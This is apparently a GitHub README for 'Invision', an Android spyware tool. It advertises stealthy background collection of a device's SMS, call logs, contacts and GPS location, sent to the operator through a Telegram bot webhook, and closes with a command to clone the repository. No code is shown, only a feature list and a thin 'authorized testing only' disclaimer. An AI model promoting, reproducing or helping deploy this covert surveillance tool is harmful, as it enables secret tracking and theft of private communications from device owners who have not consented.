Invision is an Android-based spyware script designed for educational and red team penetration testing purposes only. It collects device info, SMS, call logs, contacts, and location data, sending reports via Telegram webhook.
- Stealthy background data collection on Android devices
- Gather device info, SMS, call logs, contacts, and GPS location
- Reports sent securely via Telegram bot webhook
- Easy installation with provided bash script
- Configurable via
config.json
This tool is intended for authorized security testing and education only. Unauthorized use is illegal and unethical. The author is not responsible for misuse.
- Clone the repo:
git clone https://github.com/6lackRaven/invision.git cd invision